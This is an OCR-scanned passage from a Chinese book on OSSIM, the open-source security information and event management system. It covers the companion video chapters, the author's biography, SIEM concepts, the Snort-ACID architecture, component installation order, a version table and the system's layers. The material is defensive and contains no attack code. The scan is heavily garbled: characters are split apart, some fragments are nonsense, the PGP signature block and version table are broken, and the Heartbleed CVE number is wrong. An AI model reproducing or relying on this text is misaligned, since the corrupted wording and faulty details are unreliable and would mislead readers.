本 书 配套 光盘 包括 : OSSIM 入 门 多 媒体 教程 、OSSIM 安装 ISO、OSSIM 源码 三 部 分 内 
其 中 视频 内 容 有 以 下 章节 : 


第 一 集 : OSSIM 的 由 来 及 应 用 部 署 

第 二 集 : 网 络 成 胁 感 知 技术 探讨 

第 三 集 : OSSIM 单机 部 署 安装 与 分 布 式 安装 
第 四 集 : OSSIM 仪表 盘 操 作 初 步 

第 五 集 : SIEM 控制 台 与 Alarm 事件 告警 解析 
第 六 集 : 资产 管理 与 漏洞 扫描 

第 七 集 : OpenVAS 组 成 及 升级 实践 

第 八 集 : NetFlow 应 用 

第 九 集 : OSSIM 权限 设置 与 策略 管理 

第 十 集 : 用 OSSIM AUS s xc 

第 十 一 集 : 报表 合 规 管理 

第 十 二 集 : 命令 行 模式 下 控制 台 综 合 管理 
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李 晨 光 ， 毕 业 于 中 国 科学 院 研究 生 院 ， 目 前 就 职 于 世界 500 强 企 业 ， 资 深 网 络 架构 师 、 
CTO 学 院 讲师 、IBM 精英 讲师 、UNIX/Linux 系统 安全 专家 ， 现 任 中 国 计 算 机 学 会 (CCF) 
级 会 员 ， 在 国内 《计算 机 安全 》《 程 序 员 》《 计 算 机 世界 》《 网 络 运 维 与 管理 》《 黑 客 防 
》 等 专业 杂志 发 表 论 文 六 十 余 篇 。 曾 独 著 畅 销 书 《Linux 企业 应 用 案例 精 解 》《Linux 企业 
用 案例 精 解 第 2 版 》《Unix/Linux 网 络 日 志 分 析 与 流量 监控 》 等 经 典 学 习 教程 ， 均 被 中 科 
图 书馆 、 国 内 重点 高 校 图 书馆 和 国立 台湾 大 学 图 书馆 等 200 多 家 图 书馆 收藏 。《Unix/Linux 
络 日 志 分 析 与 流量 监控 》 一 书 ， 于 2015 年 获 最 受 读者 喜爱 的 本 版 类 图 书 奖 。 

本 人 经 常 受 邀 在 国内 系统 架构 师 大 会 和 网 络 信息 安全 大 会 发 表 技 术 演讲 , 2012 年 担任 中 
系统 架构 师 大 会 (SACC) 运 维 开发 专场 嘉宾 主持 人 。2013 年 在 IT168 举办 企业 内 网 信息 
全 实践 沙龙 活动 中 发 表 技术 演讲 。2014 (第 十 届 ) 中 国 网 络 主管 论坛 北京 站 发 表 技术 演讲 。 
14 年 《网 络 运 维 与 管理 》 杂 志 对 本 人 进行 独家 专访 并 刊 发 于 13 期 杂志 中 、2015 年 4 月 在 


WOT 互联 网 运 维 与 开发 者 大 会 发 表 技术 演讲 ， 如 图 3 所 示 。 
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图 3 作者 在 各 种 全 国 大 会 中 发 表 技术 演讲 
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验 环境 都 已 发 布 在 作者 博客 http://chenguang.blog.51cto.com/350944/1679097， 在 此 博客 中 的 
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第 1 章 
< OSSIM 架 构 与 原理 > 


从 本 章节 可 以 学 习 到 : 


SIEM 概念 

Snort-ACID 架构 

OSSIM 架构 与 原理 

OSSIM 组 件 ( 插件、 代理 、 传 感 器 、Web 前 端 、 关 联 引擎 、 数 据 库 ) 
Agent 事件 类 型 

插件 归 一 化 处 理 流 程 

OSSIM 工作 流程 分 析 

RabbitMQ 在 OSSIM 中 的 作用 

OSSIM 系统 的 CA 中 心 

OSSIM 计划 任务 


OSSIM 概况 


OSSIM 即 开源 安全 信息 管理 系统 (Open Source Security Information Management)， 是 一 
个 目前 流行 的 开源 安全 架构 体系 。OSSIM 通过 将 开源 产品 进行 集成 ， 从 而 提供 一 种 能 够 实现 
安全 监控 功能 的 基础 平台 ,目的 是 提供 一 种 集中 式 ,能 够 更 好 地 进行 监测 和 显示 的 框架 式 系统 。 

现在 , 网 络 威胁 从 传统 的 病毒 进化 到 蠕虫、 拒绝 服务 等 恶意 攻击 ， 当 今 的 网 络 威胁 攻击 复 
杂 程 度 越 来 越 高 ， 已 不 再 局 限于 传统 病毒 、 木 马 ， 还 包括 僵尸 网 络 、 间 谍 软 件 、 流 氓 软件 、 网 
络 诈骗 、 垃 圾 邮件 、 里 虫 、 网 络 钓鱼 等 ， 它 们 都 严重 威胁 着 网 络 安全 。OSSIM 系统 通过 将 
源 工具 进行 融合 ， 从 而 提供 一 种 能 够 实现 安全 监控 功能 的 一 体 化 平台 。 

OSSIM 定位 为 一 个 集成 解决 方案 , 其 目标 并 不 是 要 开发 一 个 新 的 系统 ， 而 是 利用 丰富 的 、 
强大 的 各 种 程序 ， 包 括 Suricata、Ntop、Spade (异常 检测 引擎 )、Tcptrack CTCP 会话 实时 监 
控 )、P0f、Arpwatch (MAC 异常 检测 )、OpenVAS〔 漏 洞 扫 描 )、Nagios( 主 机 及 服务 可 用 性 
监控 )、Nikto、RabbitMQ、Redis、Ansible、Ossec 及 RRD Tools (网 络 链 路 流量 监控 软件 )、 
RRD Tool 等 开源 软件 。 

在 保留 原 有 功能 的 开放 式 环境 下 ， 将 它们 有 机 集成 起 来 。OSSIM 项 目的 核心 工作 在 于 负 
责 集 成 和 关联 各 种 产品 提供 的 信息 ， 同 时 进行 相关 功能 的 整合 ， 如 图 1-1 所 示 。OSSIM 能 为 
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您 的 企业 网 打造 一 个 从 运 维 监 控 一 事前 预警 一 事后 报警 一 SIEM 日 志 分 析 故 障 的 这 样 一 个 快 
速 解决 问题 的 网 络 系统 。 


t 
è 
TS 
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1-1 OSSIM 基本 组 成 


1.1.1 从 SIM 到 OSSIM 

IT 安全 领域 常 面 临 着 很 多 突出 情况 ， 必 然 会 导致 错综复杂 的 企业 风险 出 现 ， 这 些 风险 既 
包括 来 自 于 企业 外 部 的 各 种 数不胜数 的 入 侵 行为 , 又 包括 来 自 于 企业 内 部 的 各 种 违规 操作 以 及 
信息 的 泄露 。 为 了 应 对 各 种 不 断 涌现 的 安全 挑战 ， 企 业 开始 部 署 防火 墙 、IDS/IPS、 漏 洞 扫描 
系统 及 各 种 防 病毒 系统 等 安全 防御 系统 , 这 些 设备 确实 起 到 了 一 定 的 安全 防御 作用 , 但 同时 却 
也 引发 出 了 新 的 问题 一 一 多 套 防御 系统 给 企业 网 络 环境 带 来 了 难以 承受 的 复杂 性 。 

目前 , 市 场 上 没有 哪 家 的 系统 能 把 上 述 这 些 设 备 都 整合 成 统一 分 析 系 统 。 实 际 上 即使 部 署 
了 安防 设备 也 只 是 安全 孤岛 ， 难 以 联动 。 此 时 SIM 概念 应 运 而 生 ， 它 可 以 结合 网 络 中 心 的 现 
R, 实现 网 络 、 系 统 、 环 境 、 安 全 等 集中 式 的 综合 管理 ， 最 终 实现 网 络 中 心 的 安全 和 维护 保障 
安全 防护 水 平 的 整体 提升 。 从 2012 年 的 全 球 IT 市 场 而 言 ， 对 SIM (Security Information 
Management) 的 需求 十 分 强劲 ， 例 如 AlieVault 公司 先后 获得 了 三 千 多 万 的 投资 ， 目 前 旗下 的 
Alien Vault USM 产品 开发 迅速 ， 每 季度 更 新 一 个 新 版 本 。 
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OSSIM (Open Source+SIM)， 通 过 建立 统一 的 综合 管理 平台 体系 ， 从 而 实现 统一 管理 ， 

将 现 有 的 监控 和 维护 手段 有 机 地 联系 起 来 , 实现 各 个 安全 防御 系统 的 统一 协作 , 通过 对 已 有 安 
全 信息 的 合理 分 析 , 可 以 预计 网 络 威胁 事件 发 生 的 情况 , 主要 包括 各 种 网 络 攻击 的 发 生 频 率 和 
规模 , 网 络 中 攻击 事件 的 严重 程度 。 攻击 事件 越 多 , 造成 损害 的 风险 越 大 , 受 感染 主机 就 越 多 ， 
造成 主机 数据 泄漏 ， 甚 至 网 络 中 断 的 可 能 性 越 大 。 另 外 , 伪 尸 网 络 越 活跃 (数量 多 ， 规 模 大 )， 
A^: DDOS 攻击 , 垃圾 邮件 泛滥 的 可 能 性 越 大 。 OSSIM 包含 了 SOC C Security Operation Center) 
的 主要 内 容 ， 在 分 布 式 OSSIM 系统 中 ， 可 以 快速 地 收集 、 分 析 和 关联 整个 企业 网 中 的 安全 设 
备 日 志 信息 。 


1.1.2 ”安全 信息 和 事件 管理 (SIEM) 

日 志 管 理 是 网 络 安全 的 基础 工作 之 一 ,通常 情况 下 日 志 收 集 并 不 涉及 数据 分 析 与 挖掘 , 它 
只 是 从 不 同类 型 的 系统 、 设 备 上 收集 并 保存 好 日 志 , 这 里 的 系统 和 设备 涵盖 了 交换 机 、 防火墙 、 
路 由 器 、 服 务 器 〈 基 于 UNIX/Linux/Windows 平台 )， 以 及 应 用 程序 〈 数 据 库 、 客 户 关 系 管理 
系统 等 )， 如 图 1-2 所 示 。 但 日 志 收 集 不 等 于 日 志 分 析 ， 收 集 工 作 仅 为 后 期 日 志 关联 分 析 打 下 
基础 , 日 志 分 析 实际 上 是 日 志 消 息 的 分 析 和 处 理 , 实践 工作 中 需要 在 大 量 看 似 正常 的 日 志 中 快 
速 第 选 出 可 疑 的 网 络 事件 , 以 便 进一步 调查 分 析 , 例如 寻找 拒绝 服务 或 者 蠕虫 病毒 之 类 特定 威 


胁 等 。 
各 类 服务 器 R 网 站 h, ZEHN, ERRE 
H 


* 


图 1-2 OSSM 日 志 收集 途径 


过 去 被 称 为 安全 事件 管理 (SEM) 或 者 称 之 为 安全 信息 管理 (SIM), MWERA SIEM 
(Security Information and Event Management)， 它 分 为 商业 的 解决 方案 和 开源 的 两 种 ， 本 章 介 
绍 的 OSSIM 系统 就 是 安全 信息 与 事件 管理 (SIEM) 的 开源 解决 方案 。SIEM 通过 相关 事件 、 
用 户 、 系 统 、 数 据 、 风 险 和 准确 状态 对 策 信息 ， 从 而 让 用 户 及 时 将 各 个 安全 节点 联系 起 来 ， 及 
时 定位 攻击 , 准确 了 解 全 网 的 安全 态势 。 安 全 态势 的 数据 主要 来 自 网 络 中 的 安全 设备 (如 防火 
墙 、 IOS/IPS、 蜜 网 等 )、 网 络 设备 (如 路 由 器 、 交 换 机 )、 服 务 和 应 用 。 主 要 采集 数据 包括 : 
网 络 流量 大小、 流量 成 分 )、 关 键 网 络 设备 (CPU 利用 率 、 端 口 利用 率 )、 入 侵 事 件 的 数量 
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和 严重 等 级 、 网 络 性 能 等 数据 。 

OSSIM 是 开源 的 SIM， 其 核心 仍 是 依靠 SIEM， 主 要 优点 是 通过 有 关 事 件 、 数 据 、 风 险 等 信 
息 ， 实 时 了 解 全 网 威胁 态势 。OSSIM 为 了 适应 在 大 型 网 络 中 整合 与 分 析 ， 从 各 种 应 用 程序 和 设备 
收集 日 志 ， 它 一 开始 设计 成 分 布 式 结构 ， 通 过 对 网 络 安全 态势 的 充分 了 解 ， 将 各 个 监控 节点 联系 
起 来 ， 形 成 一 个 数据 链 ， 经 过 关联 分 析 就 能 对 黑客 攻击 进行 分 析 ， 进 而 能 发 出 预警 。 目 前 国内 很 
多 企业 信息 化 部 署 的 安全 防线 ， 在 很 大 程度 上 仍 属于 “ 事 已 发 而 后 知 ”的 状况 。 

针对 病毒 、 木 马 、 网 络 攻 击 ， 基 本 都 采用 “ 兵 来 将 挡 、 水 来 土 掩 ”的 方式 。 虽然 在 实施 拦 
截 、 隔 离 、 清 除 的 具体 方式 方法 上 各 有 千秋 ， 但 受 限 于 技术 条 件 ， 这 些 安全 领域 的 企业 无 法 做 
到 提前 预警 ， 更 谈 不 上 防 患 于 未 然 。 

SIEM 的 亮点 是 应 对 大 数据 时 代 的 挑战 。 对 于 这 一 亮点 应 该 比 提前 预警 更 容易 理解 ,也 更 能 
够 为 客户 企业 所 接受 。 无 论 是 个 人 用 户 还 是 企业 客户 ， 在 使 用 安全 产品 时 几乎 都 遇 到 过 相同 的 
烦恼 一 一 对 病毒 库 的 频繁 升级 。 在 云 时 代 未 到 来 之 前 ， 这 几乎 是 一 道 迈 不 过 去 的 坎 。 如 今 ,“ 云 
查 杀 ”正在 取代 传统 的 单机 病毒 库 ， 将 数据 及 时 反馈 到 云端 服务 器 ， 利 用 更 加 全 面 的 病毒 库 资 
源 ， 更 准确 地 提供 解决 方案 并 进一步 扩充 病毒 数据 库 。OSSIM 中 提供 的 SIEM 这 一 特点 无 疑 体 
现 出 了 云 时 代 的 一 大 特征 ， 不 仅 能 够 每 天 处 理 企 业 中 庞大 的 各 类 网 络 事件 ， 而 且 能 够 将 这 些 事 
件 与 威胁 、 对 策 和 用 户 身份 信息 相关 联 ， 以 提供 准确 的 、 切 实 可 行 的 智能 信息 。 


1.1.3 OSSIM 的 前 世 今 生 
Linux/Unix 中 常用 Snort 来 构建 IDS 系统 ,最 常见 的 是 Snort-BASE 的 架构 ，OSSIM 设计 
之 初 为 Snort-ACID 架构 ， 如 图 1-3 所 示 。 


1-3 轻 量 级 IDS: SnorttACID 架构 


它们 的 组 件 包 括 : Linux、Apache、MySQL、PHP、Libpcap、Adodb Snort, Base. Jpgraph. 
其 系统 结构 基于 Snort 和 Base 的 IDS 系统 ， 通 常 采用 “传感器 + 数据 库 + 分 析 平 台 ” 三 层 架 构 ， 
这 三 层 可 以 装 在 单机 ， 也 可 以 分 布 式 安装 ， 这 取决 于 实际 网 络 环境 。Snort+Libpcap 构成 了 最 原 
始 的 Sensor 传感器 。 如 果 你 需要 单独 架设 这 一 传感器 ， 需 要 准备 以 下 软件 〈 版 本 以 当前 为 准 ): 


© zlib-1.2.7.tar.gz 
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libpcap-1.0.0.tar.gz 
libxml2-2.6.19.tar.gz 
libpng-1.2.44.tar.gz 
gd-2.0.33.tar.gz 
jpegsrc.v7.tar.gz 
mysql-5.0.22.tar.gz 
DBD-mysgql-3.0008.tar.gz 
httpd-2.2.14.tar.gz 
php-5.2.9.tar.bz2 
pcre-8.00.tar.gz 

snort-2.8.3.1 .tar.gz 
snortrules-snapshot-2.8.tar.gz 
snortrules-snapshot-CURRENT.tar.gz 
jpgraph-3.0.6.tar.bz2 
adodb498.tgz 
acid-0.9.6b23.tar.gz 


正确 安装 Snort 服务 器 组 件 包 括 OpenSSL, Stunnel, OpenSSH, Apache. MySQL (Server, 
Client)、GD、PHP、ADODB、Libpcap。Snort 系统 安装 难点 在 于 其 众多 组 件 的 安装 ， 由 于 数 
量 多 安装 步 又 繁杂 ， 安 装 时 需要 按照 先后 次 序 操作 (操作 者 必须 了 解 每 一 个 组 件 的 作用 )， 因 
为 有 些 软 件 包 必须 要 在 另 一 个 软件 包 安 装 完 后 才能 进行 编译 和 安装 , 因此 满足 软件 包 的 依赖 关 
REREH. Snort 系统 安装 流程 如 下 (具体 每 种 软件 包 安 装 的 细节 见 作 者 博客 ): 


1. 安装 OpenSSL 


OpenSSL 在 互联 网 上 广泛 应 用 在 在 线 支 付 、 网 银 、 电 商 网 站 、 门 户 网 站 、 电 子 邮 件 当中 。 
近期 互联 网 安全 协议 OpenSSL v1.0.1 到 1.0.1f 的 密码 算法 库 中 发 现 了 一 个 非常 严重 的 漏洞 
(CVE-2014-01600, iX Bug CRK) 会 暴露 加 密 流量 的 密 钥 、 用 户 的 名 字 和 密码 以 及 访问 的 
内 容 ， 该 漏洞 被 称 之 为 HeartBleed (心脏 流血 )， 建 议 用 户 安装 最 稳定 的 OpenSSL0.9.80。 

安装 OpenSSL 首先 是 下 载 正确 的 源 代 码 ， 可 以 在 下 面 这 个 网 站 得 到 源码 : 

http://www.openssl.org/source/ 或 ftp://ftp.openssl.org/source/ 


源码 包 下 载 后 经 过 解压 、 预 编译 、 编 译 ， 如 果 不 出 现 依赖 关系 问题 那么 你 可 以 进入 下 一 
环节 。 在 源 代码 安装 方式 中 ，OpenSSL 会 被 安装 到 /usr/local/ssl 目录 下 ，OpenSSL 由 下 面 几 
个 重要 文件 组 成 : 

€  Libcryptoa: 该 文件 是 二 进 制 文件 格式 ， 它 是 通用 的 密码 加 密 程 序 ， 包 含 了 加 密 密 码 

(libDES、IDEA ) 、 消 息 摘要 (MD5、SHA ) 、 公 共 密 钥 (RSA, DSA ) X.509 证 书 等 。 
€  Libssla: 包含 了 SSL 和 TLS 的 代码 。 
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我 们 还 需要 让 其 他 软件 包 知道 Openssl 软件 包 更 新 了 。 编 辑 /etc/1d.so.conf， 在 文件 中 添加 
一 行 : 
/usr/local/lib 


然后 ， 保 存 退 出 ， 运 行 ldconfig 命令 更 新 新 的 共享 库 。 
查看 安装 版 本 : 


#openssl version -a 
2. 安装 OpenSSH 


我 们 利用 OpenSSH 来 保证 远程 维护 的 安全 ，OpenSSH 通过 证 书 和 会 话 数据 加 密 来 维护 系 
统 安全 ， 它 包括 以 下 内 容 : 

€ Ssh 可 以 实现 两 个 主机 之 间 的 安全 、 加 密 通 信 。 
Scp: 用 于 实现 两 台 主 机 之 间 安 全 的 文件 传输 ,但 scp 依赖 于 ssh 的 验证 和 加 密 手段 。 
Sshd: 这 是 ssh 的 守护 进程 (服务 进程 ) ， 负 责 监 听 ssh 客户 端 发 来 的 链接 请 求 。 
Sftp: 用 来 实现 文件 安全 传输 ， 它 采用 加 密 的 ssh 传输 ， 可 以 完成 普通 FTP 的 所 有 功能 。 
Sftp-server: 这 是 用 来 向 sshd 提供 sftp 协议 信息 。 
Ssh-agent: 身份 验证 代理 ， 这 个 工具 是 用 来 为 RSA 公共 密 钥 证 书 保存 私有 密 钥 。 
Ssh-add: 用 于 向 身份 验证 代理 ssh-agent 中 添加 新 的 DSA 密 钥 信息 。 
Ssh-keygen: 用 于 为 ssh 生成 身份 验证 密 钥 。 


下 载 地 址 : http://www.openssh.com/portable.html。 

OpenSSH 依赖 于 OpenSSL 正常 工作 ， 它 必须 依靠 OpenSSL 加 密 库 工作 。 截 至 2015 年 4 
月 ， 最 新 的 版 本 为 OpenSSH-6.8， 当 下 载 文件 时 会 发 现 类 似 openssh-XX.tar.gz.asc 的 文件 ， 每 
个 源 代码 版 本 的 文件 都 对 应 有 个 asc 文 件 Csig 文件 作用 和 它 类 似 )， 该 asc 文件 主要 是 检验 包 
的 完整 性 ， 下 面 看 openssh-6.6p1.tar.gz 源码 包 中 asc 的 例子 : 


-——-BEGIN PGP SIGNATURE—-—- 
Version: GnuPG v2.0.22 (OpenBSD) 


iQGlAwUAUyEVxtP19WttkgOwAQr39wx/SkCPbWVsEG2Do7 IXKg1FudhK1t8QGQZC 
AbNvnsFbFZ/RNEv-BZRKHT7AmgNL Xn6/VT1RkifF3osrvJOghBEfQMkNPBSWcRzoh 
cáKdAcL6u/KFxku0x/h jqUaAV9SOH1UFvAmGv3/YTL8nl4uRBRlrVCnGoqllmlv? 
piBnb*FrAivrNV-PUMkkrCOXKrfR2ns-ZtfgwBQGQ/VuJTIQZPOUMp/GLViHBxz4l 
GOH52bolzAlunzBxXF9fWsFUBJFtCEharFr! jYulQzViUPCaf3L9w3yPb2S24wnU 
TT2CEyGbdCJVLmtD90baNKkOWe6hdc6Dz «ux. JeHkoWSvOLYdHFb jFR75v jNENYh 
evRgaL CP91micfhZDQqX6tOLnM£B jxC 3HsCYvMIDACiEvxblCtGFmOmllXIGUsh3 
ssScaCvQItMAvQd jQ0dCXS7Zcucfzzx3Fd8Q2X/h2R81yYv67 jYQy TaBV/DaFDzP 
/BhCsnq5sP6XW6rHRZGYXhMaAE jZml BySRFEzW-esnGfOvSJgnQ-Kz-- 

-H2K/ 

——-—END PGP SIGNATURE——— 


下 载 的 软件 包 都 需 通过 GnuPG 签名 ， 一 旦 服务 器 被 攻陷 ， 这 些 源 代码 就 有 可 能 被 修改 ， 


若 文 件 的 任何 地 方 被 修改 ， 则 签名 文件 就 会 改变 ， 所 以 为 了 保证 安全 ， 花 些 时 间 检 查 你 所 下 载 
的 软件 包 是 否 完整 ， 很 有 必要 。 
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按照 下 面 的 步骤 进行 预 编 译 、 编 译 和 安装 : 


#./configure; make; make install 


接 下 来 开始 产生 DSA 9:5]: 
#ssh-keygen 


| 一 些 Linux 发 行 版 可 能 会 在 连接 到 zlib 压缩 库 的 时 候 遇 到 错误 ,这 时 需要 先 安装 zlib JE CT 
l 载 地 址 hitp//www.zlibanet) o 


3. 安装 Libpcap 


Snort 传感器 上 必须 安装 捕 包 工具 ， 而 Snort 自身 并 没有 捕 包 工具 ， 它 需要 外 部 程序 库 
Libpcap 负责 从 网 卡 捕 包 ， 它 不 仅 是 为 Snort 程序 服务 ， 而 且 是 由 底层 操作 系统 提供 给 其 他 应 
用 程序 的 捕获 原始 包工 具 。 下 载 地 址 http://www.tcpdump.org/release/ ， 最 新 版 本 
libpcap-1.7.3.targz. Libpcap 缺点 : 

数据 包 的 传输 过 程 中 函数 调用 和 内 存 复制 次 数 过 多 。 

revfrom 是 一 个 系统 调用 函数 ， 每 调用 一 次 ， 它 只 向 用 户 空间 传递 一 个 包 ， 而 系统 调用 实 
际 上 是 一 个 中 断 , 因此 用 传统 的 方法 进行 大 流量 捕 包 时 , 系统 将 会 不 断 地 进行 中 断 处 理 和 进程 
切换 ， 那 么 严重 时 会 导致 CPU 无 暇 顾及 其 他 任务 。 


4. 安装 MySQL 服务 器 和 客户 端 


应 用 程序 需要 MySQL 客户 端 和 MySQL 服务 器 建立 远程 连接 。 比 如 Barnyard 这 样 的 程序 
也 需要 向 MySQL 发 送 警 报 数据 ， 因此 必须 安装 MySQL 客户 端 。 接 下 来 我 们 开始 安装 MySQL 
服务 器 和 客户 端 。 主 要 分 为 5 步 ; 


€ 下 载 。 下载 地 址 : http://dev.mysql.com/downloads/。 最 新 版 本 为 5.6.24， 大 家 可 以 下 
载 源码 包 编 译 。 

配置 。 

安全 加 固 。 

优化 。 

创建 入 侵 数 据 库 。 这 一 步 你 需要 创建 一 个 用 于 存放 事件 信息 的 数据 库 ， 接 着 需要 为 
Snort 传感器 创建 一 个 用 户 来 登录 数据 库 。 


5. 安装 NTP 


网 络 时间 协 议 NTP， 用 于 在 多 人 台 物 理 分 散 的 设备 之 间 同 步 时 间 ， 而 同步 时 间 是 事件 关联 
分 析 必 备 工 作 。 
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6. 安装 Snort 和 检测 规则 

对 于 规则 安装 此 处 省 略 ， 详 情 参 见 本 书 Snort 规则 讲解 的 内 容 。Snort 下 载 地 址 : 
https://www.snort.org/downloads/ . 

7. 配置 snort.conf 

Snort.conf 文件 是 配置 Snort 的 重点 ， 必 须 指 定 要 监控 的 IP 地 址 范围 、 启 用 的 预 处 理 程序 
以 及 使 用 的 输出 插件 和 采用 的 规则 。 

8. 运行 Snort 

Snort 通过 一 些 命令 选项 来 控制 ， 需 要 用 命令 行 给 Snort 传递 以 下 内 容 : 


€  Snort.conf 配置 文件 路 径 。 

e 日 志文 件 夹 路 径 。 

e ”网 络 接口 ( 作 抓 包 用 ) 。 

€ Snort 用 户 和 组 的 UID (AP ID) 和 GID (组 ID) . 


当 Snort 正常 运行 后 需要 查看 报警 ， 后 面 介绍 Web 入 侵 分 析 控 制 台 。 

9. 安装 Apache 

不 管 哪 种 Web 入 侵 控 制 台 ， 在 前 端 须 安装 LAMP 环境 。Apache 下 载 地 址 : 
http://httpd.apache.org/ o 

10. Rog mod ssl 

mod ssl 是 Apache 和 OpenSSL 之 间 的 接口 ，Apache 可 以 通过 各 种 模块 扩展 功能 。Apache 
有 几 百 种 模块 ，mod_ssl 只 是 其 中 之 一 

11. 安装 GD 


如 果 想 在 Snort 的 前 端 控制 台 上 看 到 各 种 图 形 显 示 ， 那 么 就 必须 安装 GD 库 ， 它 是 一 种 图 
形 库 ， 可 以 让 PHP 绘制 出 各 种 复杂 的 图 形 ，GD 库 可 以 创建 JPG、PNG 和 BMP 图 像 ， 可 以 分 
析 大 量 的 数据 集合 ， 然 后 将 这 些 数 据 绘制 成 图 表 ， 将 图 表 动 态 地 展现 给 管理 员 。 如 果 打 算 发 挥 
GD 库 的 功能 就 必须 有 以 下 3 个 库 的 支持 。 

€ Zib 压缩 库 : zlib-1.2.7.tar.gz. 

€ LibPNG 创建 PNG 文件 库 : libpng-1.2.44.tar.gz. 

€  Jpegsrc JPEG 压缩 库 : jpegsrc.v8.tar.gz. 


只 有 在 以 上 三 个 库 安 装 完毕 之 后 ， 才 能 开始 安装 GD 库 ， 其 下 载 路 径 : 
http://pkgs.org/download/php-gd . 
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12. 安装 PHP 


Snort 服务 器 管理 图 形 用 户 接口 ACID 采用 PHP 语言 编写 , 主要 用 途 是 将 传感器 收集 的 入 
侵 数 据 制 作成 动态 Web 页 ， 而 且 查 询 接 口 也 是 PHP 编写 ， 故 在 Snort-ACID 架构 中 PHP 环境 
须 安 装 完整 。 


13. 安装 ADODB 


由 于 PHP 不 能 直接 访问 MySQL 数据 ， 中 间 必 须 通 过 一 个 接口 库 ， 这 个 接口 库 就 是 
ADODB， 它 在 两 者 间 起 到 桥梁 作用 。 它 的 位 置 通常 都 在 PHP 目录 下 ， 以 OSSIM 系统 为 例 ， 
其 路 径 为 /usr/share/php/adodb/， 配 置 文件 为 /usr/share/php/adodb/adodb.inc.php。 


14. 安装 ACID 


ACID 〈 入 侵 数据 库 分 析 控 制 台 ) 是 一 个 基于 PHP 的 分 析 引 擎 ， 它 通过 Web 界面 来 查看 
Snort 所 产生 的 安全 事件 。ACID 能 运行 在 多 种 操作 系统 中 ， 为 了 使 用 ACID， 用户 系统 中 必须 
安装 Snort、Apache、MySQL、PHP， 它 们 之 间 的 关系 如 下 : 


€ /— 当 入 侵 者 进入 监控 网 段 内 并 进行 各 种 攻击 行为 ，Snort 会 根据 规则 检测 到 入 侵 行为 ， 然 后 
根据 其 配置 文件 /etc/snort/snort.conf 的 配置 ， 将 告警 信息 记录 到 MySQL 数据 库 。 

€ 用户 使 用 Web 浏览 器 连接 到 Snort 服务 器 。 

© PHP 连接 到 数据 库 ， 提 取 告 警 信息 。 

e 用户 在 浏览 器 中 查看 告警 信息 。 

在 OSSIM 系统 中 这 些 工 具 包 已 经 集成 到 系统 中 ， 普 通用 户 用 ISO 镜像 即 可 快速 安装 ， 深 
A T f OSSM 之 后 可 以 手动 安装 OSSIM ， 详 细 内 容 参 考博 文 
http://chenguang.blog.5 1cto.com/350944/1691090。 

为 了 监控 完整 ， 可 根据 网 络 分 布 情况 ， 在 多 个 网 络 关键 节点 上 分 别 部 署 IDS 传感器 。 当 
传感器 Snort 获得 记录 信息 后 有 几 种 处 理 方式 : 


o 存储 到 本 地 日 志 。 
e ”转发 到 Syslog。 
© 存储 到 MySQL。 


Snort 日 志 记录 仅 包 含 网 络 数据 包 的 原始 信息 ， 对 于 这 些 大 量 信息 进行 人 工分 析 ， 显 然 不 
太 可 能 ， 所 以 产生 了 一 个 能 够 操作 查询 数据 库 的 分 析 平台 ， 目 前 更 新 到 BASE (Basic Analysis 
and Security Engine，http://base.professionallyevil.com/， 最 新 版 本 1.4.5) 版 本 。 初 学 者 独立 架 
构 这 样 一 套 复杂 系统 会 遇 到 各 种 问题 有 什么 办 法 可 以 将 这 些 组 件 一 次 性 安装 配置 好 , 形成 即 
装 即 用 的 产品 呢 ? 在 2003 年 8 H, OSSM 的 雏形 便 产 生 ， 经 过 十 多 年 的 演进 ， 目 前 已 发 展 成 
为 一 套 功能 齐全 的 安全 管理 与 分 析 平台 ， 其 开发 公司 Alienvault 在 2012 年 7 月 获 3440 万 美元 
融资 ， 发 展 势头 喜人 。 下 面 我 们 看 看 OSSIM 各 版 本 变迁 ， 如 表 1-1 所 示 。 
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表 1-1 OSSIM 版 本 变迁 


年 份 月 份 OSSIM 版 本 
8 月 OSSIM 0.1~0.4 
w 9 月 OSSIM 0.5 
10 月 OSSIM 0.6 
[ug — [ossmoz 
EYES [18 — o  Tosmo 
2005 年 OSSIM 0.9.8 
2006 年 16 月 | ossIMo0.99rc2 
2007 年 16 月 | ossImMmo0.99rc3 
2008 年 OSSIM 0.9.9 
wt E — — pet 
2010 f OSSIM 22 
Rer" OS 23d 
| 月 1  — [ossws1 
2012 年 Alienvault OSSIM 4.1 
Alienvault OSSIM 4.2 
sik Inu 月 ] Alienvault OSSIM 43 
Alienvault OSSIM 4.4 
Alienvault OSSIM 4.5 
Alienvault OSSIM 4.6 
Alienvault OSSIM 4.7 
Alienvault OSSIM 4.8 
Alienvault OSSIM 4.10 
| 9A | . [Atenas OSSIM4.II 
| 0A [Atienvaut | OSSIM 4.12 
| 1 月 [ Alienvault. OSSIM 4.13 
Alienvault OSSIM 4.14 
| ! 月 [Alienvault OSSIM 4.15 
14 月 |Alenvault OSSIM 5.0 
2015 年 
| 6 月 |Alenvault OSSIM 5.0.3 
8 月 Alienvault OSSIM 5.1.0 


从 上 表 可 以 清楚 看 出 ，OSSIM 系统 开发 从 2013 年 底 开 始 发 力 ， 以 后 开发 速度 越 来 越 快 ， 
本 书 主要 使 用 2014 年 的 稳定 版 本 OSSIM 4.8 为 平台 进行 讲解 。 
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OSSIM 架构 与 组 成 


从 架构 上 来 看 ，OSSIM 系统 是 一 个 开放 的 框架 ， 它 的 核心 价值 在 于 创新 地 集成 各 开源 软 
件 之 所 长 ，OSSIM Web UI 主要 采用 B/S 架构 ，Web 服务 器 使 用 Apache。OSSIM 系统 结构 示 
意图 如 图 1-4 所 示 。 数 据 处 理 的 层次 感 ， 在 这 张 图 中 体现 得 淋漓 尽 致 。 


如 上 图 所 示 ，OSSIM 系统 结构 包括 三 个 层次 : 数据 采集 层 、 核 心 处 理 层 和 数据 展现 层 。 


第 1 层 ， 属 于 数据 采集 层 ， 使 用 各 种 采集 技术 采集 流量 信息 、 日 志 、 各 种 资产 信息 ， 经 过 
归 一 化 处 理 后 传 入 核心 层 。 该 层 体现 安全 事件 来 源 ， 入 侵 检测 、 防 火 墙 、 重 要 主机 发 出 的 日 志 
都 是 安全 事件 来 源 ， 对 于 OSSIM 而 言 ， 数 据 越 多 越 好 ， 如 果 没 有 收集 足够 的 数据 ，OSSIM 就 
无 法 进行 全 面 分 析 。 它们 按 发 出 机 制 分 为 两 类 : 模式 侦查 器 和 异常 监控 (两 者 都 采集 警告 信息 ， 
功能 互补 )， 由 它们 采集 的 安全 事件 ， 再 被 Agent 转换 为 统一 的 格式 发 到 OSSIM 服务 器 ， 这 
一 层 就 是 Sensor 要 完成 的 内 容 。 

